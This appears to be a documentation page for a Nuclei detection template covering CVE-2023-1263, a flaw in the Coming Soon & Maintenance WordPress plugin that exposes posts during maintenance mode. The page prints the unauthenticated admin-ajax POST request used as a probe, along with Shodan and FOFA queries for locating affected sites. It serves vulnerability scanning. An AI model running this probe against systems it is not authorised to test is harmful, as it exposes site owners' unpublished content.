Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
ID: CVE-2023-1263
Severity: medium
Author: r3Y3r53
Tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes
Description
Section titled “Description”The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
YAML Source
Section titled “YAML Source”id: CVE-2023-1263
info: name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access author: r3Y3r53 severity: medium description: | The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them. remediation: Fixed in version 4.1.7 reference: - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b - https://nvd.nist.gov/vuln/detail/CVE-2023-1263 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure - https://wordpress.org/plugins/cmp-coming-soon-maintenance/ - https://plugins.trac.wordpress.org/browser/cmp-coming-soon-maintenance/tags/4.1.6/niteo-cmp.php#L2759 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-1263 cwe-id: CWE-200 epss-score: 0.00238 epss-percentile: 0.61195 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: niteothemes product: coming_soon_\&_maintenance framework: wordpress shodan-query: http.html:/wp-content/plugins/cmp-coming-soon-maintenance/ fofa-query: body=/wp-content/plugins/cmp-coming-soon-maintenance/ publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes
http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=cmp_get_post_detail&id=1
matchers-condition: and matchers: - type: word part: body words: - '"img":' - '"date":' - '"title":' condition: and
- type: word part: header words: - application/json
- type: status status: - 200# digest: 490a0046304402202797bb95ea17b4682ba57e964af29170efa07012643ea9dcc4b36d8396dd4c77022032a3d59e3b8f60add90b81514cf05db30e6252764d4f967703b4d4da5990f79d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1263.yaml"